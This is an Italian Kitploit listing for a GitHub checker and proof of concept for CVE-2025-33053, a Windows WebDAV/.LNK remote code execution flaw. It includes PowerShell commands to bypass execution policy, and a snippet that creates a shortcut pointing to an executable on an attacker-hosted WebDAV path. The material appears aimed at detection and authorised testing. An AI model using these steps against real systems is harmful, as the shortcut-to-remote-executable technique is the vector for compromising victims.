Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-33053-Checker-PoC — CVE-2025-33053 Checker e PoC | Kitploit
Strumenti/GitHubGitHub/thetorjancaptain/cve-2025-33053-checker-poc
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingApprendimento e Formazione
GitHubthetorjancaptain/cve-2025-33053-checker-poc

CVE-2025-33053-Checker-PoC

CVE-2025-33053 Checker e PoC

Vedi Repository
121 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Checker della vulnerabilità CVE-2025-33053 e Proof-of-Concept (PoC)

Prova del Checker Prova del Checker

Prova del PoC Prova del PoC

Una suite completa di strumenti per verificare e dimostrare la potenziale sfruttabilità di CVE-2025-33053, una vulnerabilità critica di Remote Code Execution (RCE) basata su WebDAV che colpisce i sistemi Windows.


📌 Informazioni su CVE-2025-33053

CVE-2025-33053 consente agli attaccanti di sfruttare i file di collegamento .LNK che fanno riferimento a condivisioni WebDAV remote malevole, portando potenzialmente a Remote Code Execution (RCE) sui sistemi interessati.

Condizioni della vulnerabilità:

  • Il servizio WebClient deve essere installato e in esecuzione sul target.
  • Il sistema operativo target deve risolvere i percorsi UNC tramite WebDAV quando si accede a tali percorsi — anche tramite file .LNK.

🔍 Come funziona la vulnerabilità?

  1. File .LNK appositamente creato o accesso diretto a un percorso UNC — Punta a un percorso UNC remoto come:
  2. Quando il file .LNK viene aperto o il percorso UNC viene esplorato manualmente (ad es. tramite Esplora File): - Il servizio WebClient avvia la comunicazione con la posizione UNC remota tramite WebDAV. - Il sistema invia una richiesta PROPFIND per interrogare i metadati dal server dell'attaccante.
  3. Alla ricezione della richiesta PROPFIND, l'attaccante può confermare che: - Il sistema target risolve i percorsi UNC tramite WebDAV. - Il sistema è potenzialmente vulnerabile a CVE-2025-33053.

✅ Checker della vulnerabilità in tempo reale (CVE-2025-33053_checker.ps1)

Cosa fa:

VerificaScopo
🔍 Stato del servizio WebClientConferma se il supporto WebDAV è attivo e in esecuzione.
🔍 Gestione dei percorsi UNC tramite Test-PathVerifica se il sistema risolve i percorsi UNC WebDAV remoti (precondizione chiave per lo sfruttamento della CVE).

Come eseguirlo:

  1. Apri PowerShell come amministratore.

  2. Se l'esecuzione degli script è limitata, esegui:

root@kitploit:~
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
  1. Esegui il checker: .\CVE-2025-33053_checker.ps1

⚙️ Server Proof-of-Concept (PoC) (CVE-2025-33053_PoC.py)

Cosa fa:

  • Configura un server simile a WebDAV basato su Python sulla macchina dell'attaccante.
  • Cattura le richieste PROPFIND in arrivo quando il sistema vittima risolve il percorso UNC malevolo.
  • Mostra nel terminale che il sistema si è connesso — dimostrando la possibilità di sfruttamento.

Nota: testato in VM.

Utilizzo:

  1. Sulla macchina dell'attaccante (Kali):
root@kitploit:~
python3 CVE-2025-33053_PoC.py --port 8000
  1. Sul sistema target:
  • Apri il percorso UNC direttamente in Esplora File:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • Crea manualmente un file .LNK in Windows oppure naviga semplicemente a:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • Metodo di esempio in PowerShell per creare un file di collegamento:
root@kitploit:~
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
  1. Se il target è vulnerabile, il server PoC registrerà nel log:
root@kitploit:~
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!

🔍 Perché questo PoC è legittimo e affidabile:

✔️ Usa la risoluzione reale dei percorsi UNC — nessuna simulazione. ✔️ Cattura le richieste PROPFIND reali innescate dal sistema operativo — il comportamento esatto richiesto per lo sfruttamento della CVE. ✔️ Dimostra prove reali a livello di rete della vulnerabilità, senza eseguire payload o causare danni.


🚧 Note importanti

Questo PoC non sfrutta né danneggia il sistema target — rileva solo il comportamento vulnerabile sottostante. Da utilizzare in ambienti controllati o con autorizzazione esplicita. Dimostra il comportamento reale del sistema — non una simulazione fittizia. Da utilizzare solo per scopi educativi. Non eseguirlo su sistemi non autorizzati.


🏷️ Licenza

Licenza MIT — Gratuita solo per scopi educativi, di ricerca e difensivi.


🤝 Contributi

Pull Request benvenute — migliora il rilevamento, aggiungi funzionalità o proponi correzioni.


⚠️ Disclaimer

Questo repository è solo per ricerca sulla sicurezza a scopo educativo e autorizzata. È severamente vietato l'uso improprio contro sistemi che non possiedi o per i quali non hai il permesso di testarli.

Scarica lo strumento